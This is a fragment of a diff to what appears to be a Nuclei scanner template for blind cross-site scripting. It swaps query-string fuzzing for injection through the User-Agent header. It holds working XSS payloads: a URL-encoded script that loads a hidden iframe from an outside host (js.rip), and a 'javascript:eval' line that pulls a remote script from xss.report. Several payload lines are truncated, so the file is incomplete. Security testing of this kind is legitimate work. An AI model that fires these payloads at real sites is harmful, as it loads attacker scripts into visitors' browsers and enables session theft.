"%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fjs%2Erip%2F1wqkhxuglq%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" - -http: - - method: GET - path: - - "{{BaseURL}}" +requests: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: {{injection}} + payloads: - blind: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{blind}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - type: word - part: header - words: - - "text/html" + injection: + - '">' + - '">' + - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' + - '">' + - '">